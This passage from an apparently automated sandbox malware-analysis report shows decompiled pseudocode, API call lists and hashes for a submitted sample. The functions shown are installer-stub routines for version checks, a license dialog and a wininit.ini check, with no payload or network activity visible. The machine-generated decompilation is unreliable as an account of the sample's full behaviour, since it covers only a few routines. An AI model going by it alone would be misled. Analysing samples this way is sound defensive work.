                                                                                                                                                                                                          				long _t31;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t36 = __ebx;
                                                                                                                                                                                                          				_t19 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                          				_t41 =  *0x8681d8; // 0xfffffffe
                                                                                                                                                                                                          				_t43 = 0;
                                                                                                                                                                                                          				_v180 = 0xc;
                                                                                                                                                                                                          				_v176 = 0;
                                                                                                                                                                                                          				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                          					 *0x8681d8 = 0;
                                                                                                                                                                                                          					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                          					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                          						_t41 =  *0x8681d8; // 0xfffffffe
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t41 = 1;
                                                                                                                                                                                                          						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t31 = RegQueryValueExA(_v172, 0x861140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                          							_t43 = _t31;
                                                                                                                                                                                                          							RegCloseKey(_v172);
                                                                                                                                                                                                          							if(_t31 != 0) {
                                                                                                                                                                                                          								goto L12;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t40 =  &_v176;
                                                                                                                                                                                                          								if(E008666F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                          									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                          										 *0x8681d8 = _t41;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L12;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0086686E
                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004A), ref: 008668A7
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008668CC
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,?,0000000C), ref: 008668F4
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00866902
                                                                                                                                                                                                            • Part of subcall function 008666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0086691A), ref: 00866741
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Control Panel\Desktop\ResourceLocale, xrefs: 008668C2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                          • API String ID: 3346862599-1109908249
                                                                                                                                                                                                          • Opcode ID: 00a2371be1694ffef26468245031e626754772ff425044bed637e92cdb7d8e02
                                                                                                                                                                                                          • Instruction ID: c69dd78b981c7b44db8ff4fb7bb688988a507a320470ce5f920d3b339259061f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00a2371be1694ffef26468245031e626754772ff425044bed637e92cdb7d8e02
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4318031A00259DFDF218B21DC45BAABB78FB45728F0201A5E94DF2140EB709D958F92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00863A3F(void* __eflags) {
                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				CHAR* _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t16 = "LICENSE";
                                                                                                                                                                                                          				_t1 = E0086468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                          				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                          				 *0x868d4c = _t3;
                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                          					_t19 = _t16;
                                                                                                                                                                                                          					if(E0086468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                          						if(lstrcmpA( *0x868d4c, "<None>") == 0) {
                                                                                                                                                                                                          							LocalFree( *0x868d4c);
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t9 = E00866517(_t19, 0x7d1, 0, E00863100, 0, 0);
                                                                                                                                                                                                          						LocalFree( *0x868d4c);
                                                                                                                                                                                                          						if(_t9 != 0) {
                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x869124 = 0x800704c7;
                                                                                                                                                                                                          						L2:
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					LocalFree( *0x868d4c);
                                                                                                                                                                                                          					 *0x869124 = 0x80070714;
                                                                                                                                                                                                          					goto L2;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          				 *0x869124 = E00866285();
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00862F64,?,00000002,00000000), ref: 00863A5D
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00863AB3
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(<None>,00000000), ref: 00863AD0
                                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00863B13
                                                                                                                                                                                                            • Part of subcall function 00866517: FindResourceA.KERNEL32(00860000,000007D6,00000005), ref: 0086652A
                                                                                                                                                                                                            • Part of subcall function 00866517: LoadResource.KERNEL32(00860000,00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00866538
                                                                                                                                                                                                            • Part of subcall function 00866517: DialogBoxIndirectParamA.USER32(00860000,00000000,00000547,008619E0,00000000), ref: 00866557
                                                                                                                                                                                                            • Part of subcall function 00866517: FreeResource.KERNEL32(00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00866560
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00863100,00000000,00000000), ref: 00863AF4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$LICENSE
                                                                                                                                                                                                          • API String ID: 2414642746-383193767
                                                                                                                                                                                                          • Opcode ID: 52b8e8120424b9285d87039b04d63ef0ecc6fc00a21e66c1e362096d22889bd0
                                                                                                                                                                                                          • Instruction ID: 3a84744c692bd0f4d853f43bef36bc9d6bc4f72cd08d635cb9f30556f24d1a7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52b8e8120424b9285d87039b04d63ef0ecc6fc00a21e66c1e362096d22889bd0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9111DD70301201EBD7649F76AC0AE1739BEFBD5710B13512DF545EB2E1EEF988009625
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E008624E0(void* __ebx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t7;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t20 = __ebx;
                                                                                                                                                                                                          				_t7 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                          				_t25 = 0x104;
                                                                                                                                                                                                          				_t26 = 0;
                                                                                                                                                                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          					E0086658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                          					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                          					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                          					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                          						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                          						_lclose(_t25);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00862506
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0086252C
                                                                                                                                                                                                          • _lopen.KERNEL32 ref: 0086253B
                                                                                                                                                                                                          • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0086254C
                                                                                                                                                                                                          • _lclose.KERNEL32(00000000), ref: 00862555
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                          • String ID: wininit.ini
                                                                                                                                                                                                          • API String ID: 3273605193-4206010578
                                                                                                                                                                                                          • Opcode ID: dc82fa7edd1b91426adfbea592229b4aea0d1ed054676d741007d5826f8de1b8
                                                                                                                                                                                                          • Instruction ID: 4ebb9a5aa17310318c1185b47d3f6df3d0e13398e5e1181d7d00acf556d7eaf5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc82fa7edd1b91426adfbea592229b4aea0d1ed054676d741007d5826f8de1b8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C01B532600518A7C720EB699C0DEDF7B7CFB45750F020195FA59E3190DEB48E45CE92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E008636EE(CHAR* __ecx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                          				signed int _v420;
                                                                                                                                                                                                          				signed int _v424;
                                                                                                                                                                                                          				CHAR* _v428;
                                                                                                                                                                                                          				CHAR* _v432;
                                                                                                                                                                                                          				signed int _v436;
                                                                                                                                                                                                          				CHAR* _v440;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                          				CHAR* _t77;
                                                                                                                                                                                                          				CHAR* _t91;
                                                                                                                                                                                                          				CHAR* _t94;
                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                          				CHAR* _t98;
                                                                                                                                                                                                          				signed char _t99;
                                                                                                                                                                                                          				CHAR* _t104;
                                                                                                                                                                                                          				signed short _t107;
                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                          				short _t113;
                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                          				signed char _t115;
                                                                                                                                                                                                          				short _t119;
                                                                                                                                                                                                          				CHAR* _t123;
                                                                                                                                                                                                          				CHAR* _t124;
                                                                                                                                                                                                          				CHAR* _t129;
                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                          				signed int _t132;
                                                                                                                                                                                                          				CHAR* _t135;
                                                                                                                                                                                                          				CHAR* _t138;
                                                                                                                                                                                                          				signed int _t139;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t72 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                          				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                          				_t115 = __ecx;
                                                                                                                                                                                                          				_t135 = 0;
                                                                                                                                                                                                          				_v432 = __ecx;
                                                                                                                                                                                                          				_t138 = 0;
                                                                                                                                                                                                          				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                          					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                          					_t119 = 2;
                                                                                                                                                                                                          					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                          					__eflags = _t77;
                                                                                                                                                                                                          					if(_t77 == 0) {
                                                                                                                                                                                                          						_t119 = 0;
                                                                                                                                                                                                          						__eflags = 1;
                                                                                                                                                                                                          						 *0x868184 = 1;
                                                                                                                                                                                                          						 *0x868180 = 1;
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						 *0x869a40 = _t119;
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						__eflags =  *0x868a34 - _t138; // 0x0
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							goto L66;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t115;
                                                                                                                                                                                                          						if(_t115 == 0) {
                                                                                                                                                                                                          							goto L66;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v428 = _t135;
                                                                                                                                                                                                          						__eflags = _t119;
                                                                                                                                                                                                          						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                          						_t11 =  &_v420;
                                                                                                                                                                                                          						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                          						__eflags =  *_t11;
                                                                                                                                                                                                          						_v440 = _t115;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_v424 = _t135 * 0x18;
                                                                                                                                                                                                          							_v436 = E00862A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                          							_t91 = E00862A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                          							_t123 = _v436;
                                                                                                                                                                                                          							_t133 = 0x54d;
                                                                                                                                                                                                          							__eflags = _t123;
                                                                                                                                                                                                          							if(_t123 < 0) {
                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                          								__eflags = _v420 - 1;
                                                                                                                                                                                                          								if(_v420 == 1) {
                                                                                                                                                                                                          									_t138 = 0x54c;
                                                                                                                                                                                                          									L36:
                                                                                                                                                                                                          									__eflags = _t138;
                                                                                                                                                                                                          									if(_t138 != 0) {
                                                                                                                                                                                                          										L40:
                                                                                                                                                                                                          										__eflags = _t138 - _t133;
                                                                                                                                                                                                          										if(_t138 == _t133) {
                                                                                                                                                                                                          											L30:
                                                                                                                                                                                                          											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                          											_t115 = 0;
                                                                                                                                                                                                          											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                          											__eflags = _t138 - _t133;
                                                                                                                                                                                                          											_t133 = _v432;
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												_t124 = _v440;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                          												_v420 =  &_v268;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t124;
                                                                                                                                                                                                          											if(_t124 == 0) {
                                                                                                                                                                                                          												_t135 = _v436;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t99 = _t124[0x30];
                                                                                                                                                                                                          												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                          												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                          												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                          													asm("sbb ebx, ebx");
                                                                                                                                                                                                          													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t115 = 0x104;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags =  *0x868a38 & 0x00000001;
                                                                                                                                                                                                          											if(( *0x868a38 & 0x00000001) != 0) {
                                                                                                                                                                                                          												L64:
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												_push(0x30);
                                                                                                                                                                                                          												_push(_v420);
                                                                                                                                                                                                          												_push("herso");
                                                                                                                                                                                                          												goto L65;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eflags = _t135;
                                                                                                                                                                                                          												if(_t135 == 0) {
                                                                                                                                                                                                          													goto L64;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags =  *_t135;
                                                                                                                                                                                                          												if( *_t135 == 0) {
                                                                                                                                                                                                          													goto L64;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												MessageBeep(0);
                                                                                                                                                                                                          												_t94 = E0086681F(_t115);
                                                                                                                                                                                                          												__eflags = _t94;
                                                                                                                                                                                                          												if(_t94 == 0) {
                                                                                                                                                                                                          													L57:
                                                                                                                                                                                                          													0x180030 = 0x30;
                                                                                                                                                                                                          													L58:
                                                                                                                                                                                                          													_t97 = MessageBoxA(0, _t135, "herso", 0x00180030 | _t115);
                                                                                                                                                                                                          													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                          													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                          														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                          														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                          															goto L66;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														__eflags = _t97 - 1;
                                                                                                                                                                                                          														L62:
                                                                                                                                                                                                          														if(__eflags == 0) {
                                                                                                                                                                                                          															_t138 = 0;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L66;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t97 - 6;
                                                                                                                                                                                                          													goto L62;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t98 = E008667C9(_t124, _t124);
                                                                                                                                                                                                          												__eflags = _t98;
                                                                                                                                                                                                          												if(_t98 == 0) {
                                                                                                                                                                                                          													goto L57;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L58;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                          										if(_t138 == 0x54c) {
                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t138;
                                                                                                                                                                                                          										if(_t138 == 0) {
                                                                                                                                                                                                          											goto L66;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t135 = 0;
                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                          										goto L44;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                          									_t129 = _v432;
                                                                                                                                                                                                          									__eflags = _t129[0x7c];
                                                                                                                                                                                                          									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                          										goto L66;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t133 =  &_v268;
                                                                                                                                                                                                          									_t104 = E008628E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                          									__eflags = _t104;
                                                                                                                                                                                                          									if(_t104 != 0) {
                                                                                                                                                                                                          										goto L66;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t135 = _v428;
                                                                                                                                                                                                          									_t133 = 0x54d;
                                                                                                                                                                                                          									_t138 = 0x54d;
                                                                                                                                                                                                          									goto L40;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t91;
                                                                                                                                                                                                          							if(_t91 > 0) {
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t123;
                                                                                                                                                                                                          							if(_t123 != 0) {
                                                                                                                                                                                                          								__eflags = _t91;
                                                                                                                                                                                                          								if(_t91 != 0) {
                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                          								L27:
                                                                                                                                                                                                          								if(__eflags <= 0) {
                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L28:
                                                                                                                                                                                                          								__eflags = _t135;
                                                                                                                                                                                                          								if(_t135 == 0) {
                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t138 = 0x54c;
                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t91;
                                                                                                                                                                                                          							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                          							if(_t91 != 0) {
                                                                                                                                                                                                          								_t131 = _v424;
                                                                                                                                                                                                          								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                          								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                          							_t109 = _v424;
                                                                                                                                                                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                          							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                          							goto L27;
                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                          							_t135 =  &(_t135[1]);
                                                                                                                                                                                                          							_v428 = _t135;
                                                                                                                                                                                                          							_v420 = _t135;
                                                                                                                                                                                                          							__eflags = _t135 - 2;
                                                                                                                                                                                                          						} while (_t135 < 2);
                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t77 == 1;
                                                                                                                                                                                                          					if(_t77 == 1) {
                                                                                                                                                                                                          						 *0x869a40 = _t119;
                                                                                                                                                                                                          						 *0x868184 = 1;
                                                                                                                                                                                                          						 *0x868180 = 1;
                                                                                                                                                                                                          						__eflags = _t133 - 3;
                                                                                                                                                                                                          						if(_t133 > 3) {
                                                                                                                                                                                                          							__eflags = _t133 - 5;
                                                                                                                                                                                                          							if(_t133 < 5) {
                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t113 = 3;
                                                                                                                                                                                                          							_t119 = _t113;
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t119 = 1;
                                                                                                                                                                                                          						_t114 = 3;
                                                                                                                                                                                                          						 *0x869a40 = 1;
                                                                                                                                                                                                          						__eflags = _t133 - _t114;
                                                                                                                                                                                                          						if(__eflags < 0) {
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							 *0x868184 = _t135;
                                                                                                                                                                                                          							 *0x868180 = _t135;
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                          						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t138 = 0x4ca;
                                                                                                                                                                                                          					goto L44;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t138 = 0x4b4;
                                                                                                                                                                                                          					L44:
                                                                                                                                                                                                          					_push(_t135);
                                                                                                                                                                                                          					_push(0x10);
                                                                                                                                                                                                          					_push(_t135);
                                                                                                                                                                                                          					_push(_t135);
                                                                                                                                                                                                          					L65:
                                                                                                                                                                                                          					_t133 = _t138;
                                                                                                                                                                                                          					E008644B9(0, _t138);
                                                                                                                                                                                                          					L66:
